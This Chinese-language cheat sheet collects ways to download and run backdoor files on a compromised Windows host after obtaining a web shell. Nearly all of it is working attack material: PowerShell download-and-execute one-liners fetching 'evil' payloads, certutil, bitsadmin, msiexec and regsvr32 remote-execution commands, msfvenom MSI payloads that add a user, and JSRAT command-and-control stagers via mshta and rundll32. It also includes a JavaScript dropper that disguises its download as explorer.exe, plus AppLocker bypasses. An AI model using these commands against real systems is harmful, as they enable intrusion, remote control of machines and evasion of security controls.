前言
总结一下文件下载和一些冷门的执行命令的方法,建议根据当前系统的环境,如有Java就考虑Java的方式
最方便的还是通过webshell管理工具或者C2去上传下载
在渗透或是病毒分析总是会遇到很多千奇百怪的下载文件和执行命令的方法。
当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?
一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。
- 第一种,远程下载文件到本地,然后再执行;
- 第二种,远程下载执行,执行过程没有二进制文件落地,这种方式已然成为后门文件下载执行的首要方式。
实现方式
Powershell
win2003、winXP不支持
# 远程执行命令
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/imag/evil.txt'))"
# 远程下载文件
powershell -exec bypass -c (new-objectSystem.Net.WebClient).DownloadFile('http://webserver/payload.ps1','E:\payload.ps1')
FTP
ftp 192.168.3.2
输入用户名和密码后
cd E:\file # 进入E盘下的file目录
cd www # 进入服务器上的www目录
get access.log # 将服务器上的access.log下载到E:\file
可以参考:https://baike.baidu.com/item/ftp/13839
IPC$
#建立远程IPC连接
net use \\192.168.3.1\ipc$ /user:administrator "abc123!"
#复制远程文件到本地主机
copy \\192.168.3.1\c$\test.exe E:\file
Certutil
可以参考:https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx.aspx)
应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2
# 下载文件
certutil -urlcache -split -f http://192.168.3.1/test.txt file.txt
# 删除缓存
certutil -urlcache -split -f http://192.168.3.1/test.txt delete
bitsadmin
可以参考:https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx.aspx)
bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt
bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt
bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt
完整利用:
cmd.exe /c bitsadmin /transfer d90f http://site.com/a
%APPDATA%d90f.exe&%APPDATA%d90f.exe&del %APPDATA%d90f.exe
wget
Windows环境下,可上传免安装的可执行程序wget.exe到目标机器,使用wget下载文件。
wget.exe下载:https://eternallybored.org/misc/wget/
wget -O "evil.txt" http://192.168.28.128/imag/evil.txt
msiexec
msiexec 支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行
#生成msi包
msfvenom -p windows/exec CMD='net user test abc123! /add' -f msi > evil.msi
#远程执行
msiexec /q /i http://192.168.28.128/evil.msi
use png
msiexec /q /i http://site.com/payloads/calc.png
IEExec
IEexec.exe应用程序是.NET Framework附带程序,存在于多个系统白名单内。
需要执行两条命令,一条关闭.net安全策略,一条下载
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe
python
C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('http://192.168.3.1/test.zip').read();"
mshta
mshta用于执行.hta文件,而hta是HTML Applocation 的缩写,也就是HTML应用程序。而hta中也支持VBS。所以我们可以利用hta来下载文件。
mshta http://192.168.3.1/run.hta
run.hta 内容如下:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" // 这里填写命令
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
mshta是用来执行hta文件的,经过测试发现,其实没有hta文件,也可以通过mshta来执行命令的,经过几次测试发现mshta不仅可以使用vbscript,而且可以使用javascript来执行命令,整理payload如下:
- VBSCRIPT EXEC
mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
- JAVASCRIPT EXEC
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();
h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
- JSRAT
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();
h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open
("GET","http://192.168.2.101:9998/connect",false);try{h.Send();
b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").
Run("cmd /c taskkill /f /im mshta.exe",0,true);}
rundll32
其实还是依赖于WScript.shell这个组件
在这里我们使用JSRat来做演示,JSRat是一个命令和控制框架,仅为rundll32.exe和regsvr32.exe生成恶意程序。
项目地址:https://github.com/Hood3dRob1n/JSRat-Py.git
# 运行JSRat
./JSRat -i 127.0.0.1 -p 8081
默认方式
# 直接运行
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();
h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);
try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").
Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Use SCT
- 运行JSRAT:
# 结合下方的regsvr32
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
- JSRAT.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";
document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject
(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion
\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}
catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}
catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</registration>
</scriptlet>
Use WSC
- 运行计算器
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();
GetObject("script:http://urlto/calc.wsc")
- calc.wsc
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
- 运行JSRAT
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();
GetObject("script:http://urlto/JSRAT.wsc")
- JSRAT.wsc:
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();
h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</component>
</package>
regsvr32
regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
test.data内容:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
还可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct(COM scriptlet – requires a webserver to stage the payload)
regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
USE PNG
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll
js.png
<?XML version="1.0"?>
<let>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
< language="J">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("W.Shell").Run(ps,0,true);
]]>
</>
</registration>
</let>
MSXSL.EXE
msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。
下载地址为:
Command Line Transformation Utility (msxsl.exe)
msxsl.exe 需要接受两个文件,XML及XSL文件,命令行操作如下:
msxsl.exe demo.xml exec.xsl
demo.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
exec.xsl
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>
同样的,msxsl.exe可以远程加载,具体方式如下:
msxsl https://website.com/scripts/demo.xml https://website.com/scripts/exec.xsl
msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xsl
MSIEXEC
msiexec 支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行
MSF生成MSI:
msfvenom -f msi -p windows/exec CMD=calc.exe > calc.msi
命令行运行:
msiexec /quiet /i calc.msi
msiexec /q /i http://192.168.28.128/calc.msi
JS下载者
cscript test.js
# 如果下载的文件不能执行,那么将提示“msxml3.all 拒绝访问”
test.js
var WSHShell = new ActiveXObject("WScript.Shell");
path = WSHShell.ExpandEnvironmentStrings("%temp%");
var filepath = path+"/explorer.exe";
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET","http://192.168.0.101:8001/reshacker_setup.exe", false);
xhr.send();
if (xhr.Status == 200) {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var stream = new ActiveXObject("ADODB.Stream");
stream.Open();
stream.Type = 1;
stream.Write(xhr.ResponseBody);
stream.Position = 0;
if (fso.FileExists(filepath)){
fso.DeleteFile(filepath);
}
stream.SaveToFile(filepath);
stream.Close();
new ActiveXObject("WScript.Shell").Exec(filepath);
}
pubprn.vbs
在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本,其位于C:\Windows\System32\Printing_Admin_Scripts\en-US,仔细观察该脚本可以发现其显然是由用户提供输入(通过命令行参数),之后再将参数传递给GetObject()
"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:
https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/
a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
test.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
参考
Bypass AppLocker With MSXSL.EXE
Bypassing Applocker with msiexec